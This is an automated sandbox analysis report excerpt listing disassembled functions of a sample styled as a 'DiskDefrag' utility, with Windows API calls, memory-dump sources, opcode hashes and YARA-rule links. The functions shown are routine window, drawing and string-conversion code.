                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                                • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                                Function 00423340 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                                • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                                • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                                • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                                • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                                Function 004262A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74stringCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0041F6D0,?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000), ref: 004262B5
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,?,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 004262E1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000,?), ref: 004262F2
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 0042630F
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 00426330
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3322701435-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                                • Instruction ID: cb33d9e4ec5480741093735bde79ecc2fcd6722e1911622dc14afd3accb78fd4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E1191713803156BE220AFA4ECC6F27769CD745B04F61083DFB45AA2C1D5A47C448668
                                                                                                                                                                                                                                                                                                Function 00405230 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 366COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                                • String ID: ...$`=
                                                                                                                                                                                                                                                                                                • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                                • Opcode ID: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                                • Instruction ID: 472bae36e9bbe25dca023677f1d007ac7a5f0ef4219e7f68ecfc9801725c9705
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E131755087059FC310DF68C884A5BBBE5FB88304F548A2EF896A33A1D774E885CF96
                                                                                                                                                                                                                                                                                                Function 004042E0 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                                • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                                • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                                Function 00411050 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                                • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                                Function 004650D0 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                                • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                                Function 004256D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 156windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                                • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                                • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                                • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                                • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                                Function 00431060 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 150windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 004311B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004311C3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-4007200279
                                                                                                                                                                                                                                                                                                • Opcode ID: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c3eec78f5ba70d7f73749eb8d42c303dcc8a252b1b76d151490117dce650f0e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F34119717802055BEB10AF75CD82FBA3284DB59764F000A3EFA06EF2D2DA6CDC48466D
                                                                                                                                                                                                                                                                                                Function 00424660 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130timeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                                • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                                Function 0040F130 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                                Strings
